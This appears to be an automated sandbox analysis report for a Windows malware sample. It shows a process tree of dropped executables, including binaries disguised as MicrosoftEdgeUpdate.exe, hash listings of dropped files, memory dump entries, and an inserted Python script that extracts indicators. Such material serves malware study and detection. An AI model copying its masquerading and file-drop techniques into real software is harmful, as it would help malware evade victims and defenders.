                "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OTVGRDBBREYtNzBCMy00QUI1LUFBNDktMUYxN0U3M0FDQzI4fSIgdXNlcmlkPSJ7NjA0MjM0MkItN0Q2Qi00ODA5LUFEMDgtRDc4MjI2QjQxM0E5fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntENjA1REZEMC03QzBDLTQyQkMtOUY2My01QjNFOEZCNzdEQkR9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQ0LjQ1MjkiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSIxMjUiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-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-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_UDE9MTczOTgxMTQwMCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1mVDVBZjNEMXlYMWRiRkJSQ0dRNkRmM2h1TEVBWVVHcUZ6dlpHb1Q0cHByQ3NkNGxWJTJmUGdsVzY5SWVGQjBzMGJMbUdrME81ZnZ5OGl3NGgyZklWRTlRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjE2Ii8-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-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-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIzIiByZD0iNjYxMiIgcGluZ19mcmVzaG5lc3M9Ins5NUQyQTRDRC1GOEY2LTQxNzQtQTZEOS04NjA5NTI4RTE4RjV9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
                1⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                PID:4684
              • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe
                "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe"
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:1376
                • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
                  "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4848
                • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe
                  "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:2284
              • C:\Users\Admin\AppData\Roaming\system132.bind.exe
                "C:\Users\Admin\AppData\Roaming\system132.bind.exe"
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:2488
                • C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe
                  "C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:2248
                • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
                  "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4000
              • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe
                "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe"
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:4416
                • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
                  "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:5012
                • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe
                  "C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:2504
              • C:\Users\Admin\AppData\Roaming\system132.bind.exe
                "C:\Users\Admin\AppData\Roaming\system132.bind.exe"
                1⤵
                • Checks computer location settings
                • Executes dropped EXE
                PID:1388
                • C:\Users\Default\Links\MicrosoftEdgeUpdate.exe
                  "C:\Users\Default\Links\MicrosoftEdgeUpdate.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:64
                • C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe
                  "C:\Users\Admin\AppData\Roaming\system132.bind.exe.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:1556

              Network

              MITRE ATT&CK Enterprise v15

              Downloads

              • C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe

                Filesize

                220B

                MD5

                47085bdd4e3087465355c9bb9bbc6005

                SHA1

                bf0c5b11c20beca45cc9d4298f2a11a16c793a61

                SHA256

                80577e4666fad86273b01f60b8d63c15e4ce37774575ac1e0df7a7c396979752

                SHA512

                e74dd8e9756cab1123410a46609dc91540cc29a8fea93017155746f7bb9b7a41bfd3d7595a62788264bedceb475b2a733cce9b70f37cc4478302d5fc228d7684

              • C:\HypercomponentCommon\cemEzm0xYx1.bat

                Filesize

                105B

                MD5

                5ee2935a1949f69f67601f7375b3e8a3

                SHA1

                6a3229f18db384e57435bd3308298da56aa8c404

                SHA256

                c24a0d7f53a7aa3437f6b6566d3aaebdb36053b64e72cbd1d3796596fc8e3c06

                SHA512

                9777fcb9ee8a8aa0c770c835c5f30aff6efc5fb16a1819047e13d580d748703ffcb446db110067fb2546a637213cb8f25416d4b621a95a789b8e113d31d3401a

              • C:\HypercomponentCommon\hyperSurrogateagentCrt.exe

                Filesize

                1.9MB

                MD5

                7be5cea1c84ad0b2a6d2e5b6292c8d80

                SHA1

                631e3de0fe83ebacbe5be4e7f895dd0bd8b095ce

                SHA256

                6eb90684ebc56fb2713f5c468b55a964625ec2af698d9687492b1de4225693b7

                SHA512

                ea58d3b1664fe70968635c2722e19ce65ce4c1d66c68aed2d98441e60e773c7295f18d9c99cf4c454c510f33f5e37d3d2c0053b7434a46c542a0d63a4cc03647

              • C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{16DDDDD4-3CB2-417F-9F4F-24F24606B9CE}\EDGEMITMP_00554.tmp\setup.exe

                Filesize

                6.6MB

                MD5

                b4c8ad75087b8634d4f04dc6f92da9aa

                SHA1

                7efaa2472521c79d58c4ef18a258cc573704fb5d

                SHA256

                522a25568bb503cf8b44807661f31f0921dee91d37691bf399868733205690bf

                SHA512

                5094505b33a848badcffd6b3b93aad9ad73f391e201dee052376c4f8573ba351f0b8c102131216088ffb38d0ed7b5fe70ba95c3ac2c33a50c993584fe7c435e3

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\82VA2HM1OE19KO6.exe.log

                Filesize

                654B

                MD5

                11c6e74f0561678d2cf7fc075a6cc00c

                SHA1

                535ee79ba978554abcb98c566235805e7ea18490

                SHA256

                d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

                SHA512

                32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftEdgeUpdate.exe.log

                Filesize

                847B

                MD5

                37544b654facecb83555afec67d08b33

                SHA1

                4dc0f5db034801784b01befef5c1d3304145e1dc

                SHA256

                ec084a6c6ecd7d31f1927b0cd926ec03ce346a469f24e5a860e05f2241bd7bf4

                SHA512

                4af827ead52c8769672f58a69fca18484aeba1e59b7ec0527e200f8e3d893bcbc1063ea820260fc0b922985ee3b26c3a6f79b4044fb34f1b58f2e3379971b5f9

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                3KB

                MD5

                3eb3833f769dd890afc295b977eab4b4

                SHA1

                e857649b037939602c72ad003e5d3698695f436f

                SHA256

                c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

                SHA512

                c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                3726ddfd0b78d84ff1238805dd057c46

                SHA1

                d659e588d74ebceae1d1314094bf4a2b5e503ca4

                SHA256

                bebe6c87c970f73beb977e6d93a2249b15e08a1ca01ae0f35a666a9030512cb5

                SHA512

                3ad071f31234f93549f79c6a7687cf560cfa0f51351fd8a17c0ec9eca14f4ee420c0afd4b2213bdeb4c20d620b7e7dd71ff59580150c35c002e638717bee12ed

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                c9569d209d2c7736dd0bf85e5b391e18

                SHA1

                123597f50a683c6b8b724460aba71b8fbd92d7a7

                SHA256

                e65255c123e55f2972607e6f596be0e8f879a946bdceb235b635f557046bc4b7

                SHA512

                40d491e266869814da5f87410ca2b1de279a1bcd89ef382b13940bdbb9f017d3ad6ece22ab98c8f06fb9d227c4adeafd390be622cb27dd08240f201e96a5ca6a

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                6974499dcb22d12ff8893f85fbec2592

                SHA1

                61986a500a6fd1c7ab133cf693523f14d7eb28b3

                SHA256

                72081ad3e051f862fc3b3fa38d5b2c8585b11b83d11816b70434b1766c32cfd3

                SHA512

                d54d1c344afc420e4367890c75ae7c4d93353799454b8d6db09c558c80c3401e020dcd70a0a718f64e342fab120f8b1070a0586fbeb144ab4a904aec32eed992

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                97ba3ed8bdfef9018d769afeda2c34bf

                SHA1

                89a5befaae513ddb540d35878490780e1e44f828

                SHA256

                2998068580965f0bc1acf74f633ff5229ef30c15b4b2b98a0c07f4f6c009d6d1

                SHA512

                6163ab705c8c3d7edeee37d7a7c8eafca687c022614b40e33721815a9a7e77ace4c111c215b8fca597321caec67ddca56b70cfdd2015b887cdfd64e9d3012e79

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                60b3262c3163ee3d466199160b9ed07d

                SHA1

                994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

                SHA256

                e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

                SHA512

                081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                8a8dc775649664c3a2f5fa27a58f3a0c

                SHA1

                d6ab95aa1173b3905a5331d3b64c1bd468ffc483

                SHA256

                c98a5947c75bda96ad9426a9cf026ed75bcfb0f40d54b0f31f5057cc9b54d1dd

                SHA512

                29ad925827808c18dc114082af81c7a2bc5e82270437d49f8328939abe0a1387ff9c6226e98703c3dba2e67eb3108b4de990bc8985a3e68b0e40c92ba4ac9e91

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                4e5f80e3e25788fd807fa22d98e8629f

                SHA1

                30c01ab8caf6266bfc364d8fabdb9b475cf8d33c

                SHA256

                96674dcec715acfa150df4c6ac35d8fdecd1b527dd59d64568d7ad3abf1e26e8

                SHA512

                045ba195baee5075628317cff969de4e201943281abb9b0fba3f14d8914303627035c9ad62b0198c69404ac1e0dfde3304c7ef407843a72c4a0e70d4d504bbaa

              • C:\Users\Admin\AppData\Local\Temp\82VA2HM1OE19KO6.exe

                Filesize

                185KB

                MD5

                e0c8976957ffdc4fe5555adbe8cb0d0c

                SHA1

                226a764bacfa17b92131993aa85fe63f1dbf347c

                SHA256

                b8260ac46e03f2a7baa9ae01bee5443d16d9eb96f6ee8588a887d6de72a750d4

                SHA512

                3a1ea48e81ebfd5586938a72afd68bcc48d4c5d69949cfdacf33aee3371d98f202443f5db12bac876ca7cecc982ddc56827f8d9b1857d22bda71242d5b2cc71e

              • C:\Users\Admin\AppData\Local\Temp\FRCGdajqoH.bat

                Filesize

                167B

                MD5

                e060827665dadc67aa6c8c6131e5f622

                SHA1

                f75564def8b4e32c18263769be213fb329c402b0

                SHA256

                c88981b51c0087b5457ccbe83c78b91119aabe9dc27556632835c324abf97014

                SHA512

                6ea7d184dc58243939faa647544b91c4f335258feb754cbb460df151d17c1cc4eddd2f8dfe191269f0d1da2d8eef3af41505260f30b79bc4efcbf6870e61014f

              • C:\Users\Admin\AppData\Local\Temp\QNC8731GOQHJPKH.exe

                Filesize

                2.2MB

                MD5

                05d87a4a162784fd5256f4118aff32af

                SHA1

                484ed03930ed6a60866b6f909b37ef0d852dbefd

                SHA256

                7e3d0dabaded78094abfac40d694eaebf861f3cb865d3835bb053d435e996950

                SHA512

                3d4ce511e9671d8bfa15e93d681fedd972f4fe4c09ac9cfd9653afe83e936654c88ee515a76e7ac80e8f34868802e68c6531fdea0b718029d2196ad1425981fc

              • C:\Users\Admin\AppData\Local\Temp\RES35.tmp

                Filesize

                1KB

                MD5

                bf431ec47808a0185bb339738aef4bc7

                SHA1

                532e99e54de5e5859b056daae087bdfa623e48f8

                SHA256

                0f25df2234d89258f37343da8513c97e41fb305468b91d04feb229c7510e42cd

                SHA512

                bd61b87929fe70def4385f8b71787505cecc41c7b3e17f50341406807c1148ed6bb35fd0d6a65b5281161f069628e063cfe45155958f8b208187d7e702bfecdd

              • C:\Users\Admin\AppData\Local\Temp\RESB2.tmp

                Filesize

                1KB

                MD5

                8b196693c806b89c20cac2750c176cbe

                SHA1

                3ded2dacb2ace554315f8c1c110d63d5a48124ec

                SHA256

                69cd1730598b642e4e92d4f365fb051fd3bde11c7550771277833901eb2bbce5

                SHA512

                fa54bb67c65eab4f05f78cf6a7cf697c3ed7d8cc17e5de3ff9d2a2408b6557fe9b48628a0146060cbbcbda96d5cddfe01e1e9c74c0dea039fd6fb193ca843b8d

              • C:\Users\Admin\AppData\Local\Temp\RESFFC7.tmp

                Filesize

                1KB

                MD5

                e3cc7a17121307425bbdb47eca11594a

                SHA1

                c8fac0eb0c89b71e7349c2003a7281d7cdea20cc

                SHA256

                801ec18996941f3860d502e52fe1c6af7f8f3b4c77bafcd27b14322ef360a00d

                SHA512

                f1a1bf737bf73dd5b08096004d1f24301b1877c0afa14c579c04c6e613663a718e17a9bf0ad8b79868800b70ee268b54e42c5ac298efbc2025b184a39b74223c

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pwucmo0z.lyh.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\tmpF77.tmp

                Filesize

                100KB

                MD5

                1b942faa8e8b1008a8c3c1004ba57349

                SHA1

                cd99977f6c1819b12b33240b784ca816dfe2cb91

                SHA256

                555ccb7ecd9ae52a75135fdd81ab443a49d5785b0621ed6468d28c4234e46ccc

                SHA512

                5aee3d59478d41ddd5885c99b394c9c4983064e2b3528db1a3f7fc289662bced4f57d072517bbe7573c6d1789435e987ef1aa9cc91f372bcfd30bc016675fa43

              • C:\Users\Admin\AppData\Roaming\82VA2HM1OE19KO6.exe

                Filesize

                4KB

                MD5

                181510e6c7371804d59a36b012f83b2e

                SHA1

                92326a4c86ec3654bf30e015a80a9dbea6d0fe71

                SHA256

                7799d6f6c978b7973c5e79297fb195a8f051ad326b3f3abd985ba523e9234bba

                SHA512

                79b52b546f2dc71331ff14ce289897cc2b642db33e3a20cf73d0fb0453e9b51fd6c15a8c7cb70c2ce917bc85ff1d06ea9c41d28e1b4fa7a6e03eaffb036fcfef

              • C:\Users\Admin\AppData\Roaming\system132.bind.exe

                Filesize

                4KB

                MD5

                73e474864d776eb64dbd243423337dba

                SHA1

                8e1655632687d1a55c6f861b12e7f5c45eea3633

                SHA256

                ab0a9da7781aac0fc6d403c7f0e0d9685d8e4556dad128d1c9994ec68dbd6f5a

                SHA512

                4661a346026bfc0c5c2a01c1bc256c68c89b3ce7fb538ac13eb6bfc49bcafca0a0a4ac6c0dd7269c5594e1f2c1b13c0ee1039da6699db234edd72ef3e4afdd45

              • C:\Users\Admin\AppData\Roaming\system132.bind.exe

                Filesize

                181KB

                MD5

                cc753ab1d8daac56d1e705e62d632537

                SHA1

                7950dc74519b207c3e24bbaa104df978a56872cb

                SHA256

                1578626a3dcfb7b8f1b45b8a4ae7dddb8a185a9f8b5078bde4b094a93da14097

                SHA512

                3dfc0e2d1ab6bf2dba387dc9fb1bb3cc1b61ff84ce0ace8569ad138121ef0a2abfdacfe4c96559b425bdda2b7c7ba7da7df0e618cc9f3a76a5ca4ca5179325f0

              • C:\Windows\SystemTemp\msedge_installer.log

                Filesize

                70KB

                MD5

                819435218588f2490ec258f9fc0d720f

                SHA1

                7c868f2b55953d0d96ce0e6023dd2fff6dc5e984

                SHA256

                40753369b4edbe42a472af322a5509961faf69b380b813a079b9ed2bd4e5610d

                SHA512

                367daaf4845d179ee710ae4492372c7eb62514f754853d83ec98d1918d1e666c802334e52cc6d442a288a9f5f8e29d00aa626b0d9a1c5a4144ec03bffc3aa700

              • C:\Windows\SystemTemp\msedge_installer.log

                Filesize

                101KB

                MD5

                c707557af50c0b62a21ab4b850f2a042

                SHA1

                48d8b6f19b758e56585fead2df392ab9b94c2254

                SHA256

                9c4f1afa49fa94e0bf97594a40fc44b9a9f7ba7c5ed1252ea58fe4629d8df89c

                SHA512

                ae74689670921d458750fd9acd3a2ff3ecc9e035939e3024f7b4a455563edc3418dd34634cc1a511013705da8e877d18390c92ea3cae39bd95958e8233b9e204

              • C:\Windows\SystemTemp\msedge_installer.log

                Filesize

                103KB

                MD5

                5c7c159a554389844112e06dc7a3e761

                SHA1

                8356497d8e9326572a501ef1c743ad6d5eb3657b

                SHA256

                c42cd99e2c34da2e8f24b2d5c0f91645f936b28177bbc04b6a774ab2e2527475

                SHA512

                1c2e66e9d30687b920ed46c138fa6b5fd9f86b28a01c5e9e833f1d68ecab19e029fd736f1f3c9a558ce5d8d691a776742adc30397287dc0d085bce835ebc6fa3

              • \??\c:\Users\Admin\AppData\Local\Temp\0pwjgpt1\0pwjgpt1.0.cs

                Filesize

                378B

                MD5

                9f43753d5b758b122eedb03c0f7b0b24

                SHA1

                00b0a681b2265f5a02fe1c9f19cd1fbe7addc1d1

                SHA256

                c9d13b35aa65640aa5aa98771caf24346f772013d51a01ea184585f116231eb3

                SHA512

                1b7cc938a02a8474564f9c118eddfee7dc9e74192a2d304c449109b1c28dd8c5f5654486a8a269bf3585ddc68c9a43c5eb0aa4862b33bc64d4abb1458a9666d2

              • \??\c:\Users\Admin\AppData\Local\Temp\0pwjgpt1\0pwjgpt1.cmdline

                Filesize

                235B

                MD5

                74ad14fd4af3c3406dad37e39f2d46b9

                SHA1

                5c6ae1323f22997f6535056a5165f4131126afcc

                SHA256

                67a3dc49703fd9e8e11d18c8da330431f754c7542394e093ef8c0bbb04a794f5

                SHA512

                0a5dd80b43c23a3e5818280404de8b45a4844cbfd0be45ae5aefbc6ced9350b803adb8571e75aff3a794c2c5f936d7015846f9a51aad0159de662cba018821d0

              • \??\c:\Users\Admin\AppData\Local\Temp\msd5mc2m\msd5mc2m.0.cs

                Filesize

                398B

                MD5

                a3b7826332b8f55c7b97b28437e16ceb

                SHA1

                2166e78194ed8eda8807a40095be140cdcbca4d7

                SHA256

                8cef28da5643d5a721ac2cc354d131376c61941008a8bb29ce271e690a2f7272

                SHA512

                b92cb6d29ed229097d5c920f159a90e1767265b885eab426908619005d0233ee5d155eae7c2e7557ba5dfc0ec3d52e8300d6d9a906cb65c66c377f7d3b551693

              • \??\c:\Users\Admin\AppData\Local\Temp\msd5mc2m\msd5mc2m.cmdline

                Filesize

                255B

                MD5

                704d1ffec4780d25717bcd512cd0da46

                SHA1

                08283569d0d7df445f01da5de0917596a9e3f188

                SHA256

                af7964767b601cd822ae63578b1f8c1fa14c1a59eb6d0d2a6b4d2aaca86d59f5

                SHA512

                2e3cb2d53c09f02d38b42da8783482c937c1653135a99312ffcc1b8724983a2472386e76da780dfacf07d7849427f2e1c0be933ded60b74b9393c6cb4178f4f3

              • \??\c:\Users\Admin\AppData\Local\Temp\vi4fp1vm\vi4fp1vm.0.cs

                Filesize

                397B

                MD5

                23e534da282cafebb557fdd719ed5c6c

                SHA1

                35afcdec495ab911dcf7627187badba1552d74fe

                SHA256

                d2a015511d01114d3d815fe35422ece3a2e829c4b3c9f64a76bbdbeb55b94209

                SHA512

                c958dfac92e18c4c3291c6e7a54e862b98b2c0bed83775096c4e93ee76c0b18de28a09209a96c8e48e1e6b75e553fe1caf6f3ff8ed92c2f05306768edb203f63

              • \??\c:\Users\Admin\AppData\Local\Temp\vi4fp1vm\vi4fp1vm.cmdline

                Filesize

                254B

                MD5

                043482d11bbaa485c87d53d3a33d7ed5

                SHA1

                79b5aef6bda2e87ba41d647275d74e86738849f5

                SHA256

                bad4ccab6fc27a8b6a4947e76dd92fab3400634075c2b028c318a905fc6a2d9f

                SHA512

                6cd16567456ff42f7eac4e9386beeef9fdee5af4f0d9b4cd1ac9da6b8e640cb892eaa1ec479ea5dbfda58bdbee88b53268ee30fef9c0f387cbbfdfa2315d2aba

              • \??\c:\Users\Admin\AppData\Roaming\CSC198CCA46E0934C83B8ED48F26A282482.TMP

                Filesize

                1KB

                MD5

                30ff36986a7c89d143d4e9491850a349

                SHA1

                821f390096ccac9adf60dcc3b82f80f8755c6d1b

                SHA256

                2d25e34a25ced180c7de09a7292709651feebe6664effae6ba678fc4c5fd2f47

                SHA512

                7ed109e40e83d4ad747e3bff0b46bd104cf6bec9a6de01ea823e74ccf4bb5c3f4201fa32efb760776f9c8e5048df27f10d3bf5a71d85ba1c10892cfa36c4d8e7

              • \??\c:\Users\Admin\AppData\Roaming\CSC34E87D7A13ED4FE182C60C089477BE9.TMP

                Filesize

                1KB

                MD5

                60ea77a1da1af7fa85fc777121293cdb

                SHA1

                68f8f8bdcdc8fc700d856a0b8f583a3d40a7bd0e

                SHA256

                24ba3c3c3eb23dfe14b9bf01550318eb97b1015570daf7c58fc4c0aa352d0a98

                SHA512

                10f01cd46167da1b1b1f4fc0881bbd1829a6c5417f27c992cd79cb743c55a8e085484659add8e967cd0a3515f907c2cacbc5b60042ebfaa46045bc48181bc561

              • \??\c:\Windows\System32\CSCC96C9C2BDE2C408AB8ABA1A788B332BD.TMP

                Filesize

                1KB

                MD5

                3d8fdc8666dd0f8286edb60b585b97e2

                SHA1

                01a3a34797bd480c9216479a66ce39dc25618f17

                SHA256

                60721cc5318e1d7ded6be2eff7f653249373b8205420c9c6096204cab321485a

                SHA512

                e46e262c9208f6bfdc5d735de555c34f51d3029b993c74b7d9cc5329c44e0f318f7da8fe08cbc2638cfcf4b42598d0f2ae93d468e2a1974caa8fbd5826cb1865
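
The listing above repeats the same path with different hashes (StartupProfileData-NonInteractive seven times; system132.bind.exe twice, at 4KB and 181KB), which the layout shows but does not summarise, and in an extracted report a truncated hash is easy to miss. The Python below is an added example, not tooling from the report, that parses the bullet/label/value layout into records, validates hash lengths, reports paths written more than once, and emits a de-duplicated SHA256 IOC list. The excerpt it parses is constructed from two of the entries above plus one memory-dump entry; SHA512 values were left out of the excerpt for brevity, but the parser handles them.

```python
"""Parse the dropped-file ("Downloads") listing of a sandbox report into IOCs."""
import re
from collections import defaultdict

# Constructed excerpt in the report's own layout (bullet with the path, then
# label/value pairs). The values are copied from the listing above.
SAMPLE_REPORT = r"""
• C:\Users\Admin\AppData\Roaming\system132.bind.exe

  Filesize

  4KB

  MD5

  73e474864d776eb64dbd243423337dba

  SHA1

  8e1655632687d1a55c6f861b12e7f5c45eea3633

  SHA256

  ab0a9da7781aac0fc6d403c7f0e0d9685d8e4556dad128d1c9994ec68dbd6f5a

• C:\Users\Admin\AppData\Roaming\system132.bind.exe

  Filesize

  181KB

  MD5

  cc753ab1d8daac56d1e705e62d632537

  SHA1

  7950dc74519b207c3e24bbaa104df978a56872cb

  SHA256

  1578626a3dcfb7b8f1b45b8a4ae7dddb8a185a9f8b5078bde4b094a93da14097

• memory/784-1-0x00000000003B0000-0x00000000003E2000-memory.dmp

  Filesize

  200KB
"""

HASH_LABELS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
LABELS = set(HASH_LABELS) | {"Filesize"}


def parse_downloads(text):
    """Turn the bullet/label/value layout into a list of dicts, one per entry."""
    entries, current, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):            # new entry: the path follows the bullet
            current = {"path": line[1:].strip()}
            entries.append(current)
            pending = None
        elif current is None:
            continue                        # text before the first bullet
        elif line in LABELS:
            pending = line                  # next non-blank line is this label's value
        elif pending:
            current[pending] = line
            pending = None
    return entries


def malformed_hashes(entries):
    """(path, label) pairs whose hash is not the expected hex length: a sign of truncation."""
    bad = []
    for e in entries:
        for label, n in HASH_LABELS.items():
            if label in e and not re.fullmatch(r"[0-9a-f]{%d}" % n, e[label]):
                bad.append((e["path"], label))
    return bad


def rewritten_paths(entries):
    """Paths listed more than once with different content: overwritten during the run."""
    by_path = defaultdict(set)
    for e in entries:
        if "SHA256" in e:
            by_path[e["path"]].add(e["SHA256"])
    return {p: sorted(h) for p, h in by_path.items() if len(h) > 1}


def file_iocs(entries):
    """Sorted, de-duplicated SHA256 values; memory dumps carry no hash and are skipped."""
    return sorted({e["SHA256"] for e in entries if "SHA256" in e})


if __name__ == "__main__":
    parsed = parse_downloads(SAMPLE_REPORT)
    print("bad hashes:", malformed_hashes(parsed))
    print("rewritten:", rewritten_paths(parsed))
    print("\n".join(file_iocs(parsed)))
```

Running it over the full listing instead of the excerpt gives the complete dropped-file IOC set for blocking or retro-hunting, and the rewritten-paths output makes the repeated PowerShell startup-profile writes and the two-stage write of system132.bind.exe visible at a glance.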

              • memory/784-60-0x000000001DE60000-0x000000001DE6C000-memory.dmp

                Filesize

                48KB

              • memory/784-277-0x000000001B4F0000-0x000000001B57E000-memory.dmp

                Filesize

                568KB

              • memory/784-1-0x00000000003B0000-0x00000000003E2000-memory.dmp

                Filesize

                200KB

              • memory/784-282-0x000000001B580000-0x000000001B58A000-memory.dmp

                Filesize

                40KB

              • memory/784-271-0x000000001D7E0000-0x000000001D86E000-memory.dmp

                Filesize

                568KB

              • memory/784-57-0x00007FF947560000-0x00007FF948022000-memory.dmp

                Filesize

                10.8MB

              • memory/784-58-0x00007FF947560000-0x00007FF948022000-memory.dmp

                Filesize

                10.8MB

              • memory/784-0-0x00007FF947563000-0x00007FF947565000-memory.dmp

                Filesize

                8KB

              • memory/784-246-0x000000001D990000-0x000000001D9CA000-memory.dmp

                Filesize

                232KB

              • memory/1164-14-0x00007FF947560000-0x00007FF948022000-memory.dmp

                Filesize

                10.8MB

              • memory/1164-2-0x0000026BB8CD0000-0x0000026BB8CF2000-memory.dmp

                Filesize

                136KB

              • memory/1164-12-0x00007FF947560000-0x00007FF948022000-memory.dmp

                Filesize

                10.8MB

              • memory/1164-18-0x00007FF947560000-0x00007FF948022000-memory.dmp

                Filesize

                10.8MB

              • memory/1164-13-0x00007FF947560000-0x00007FF948022000-memory.dmp

                Filesize

                10.8MB

              • memory/1164-15-0x00007FF947560000-0x00007FF948022000-memory.dmp

                Filesize

                10.8MB

              • memory/1188-258-0x000000001ED00000-0x000000001EE14000-memory.dmp

                Filesize

                1.1MB

              • memory/2020-75-0x00000000000A0000-0x00000000000D4000-memory.dmp

                Filesize

                208KB

              • memory/3156-267-0x0000000000A10000-0x0000000000A18000-memory.dmp

                Filesize

                32KB

              • memory/3864-262-0x0000000000400000-0x0000000000408000-memory.dmp

                Filesize

                32KB

              • memory/4636-121-0x000000001B7F0000-0x000000001B80C000-memory.dmp

                Filesize

                112KB

              • memory/4636-124-0x000000001C2D0000-0x000000001C2E8000-memory.dmp

                Filesize

                96KB

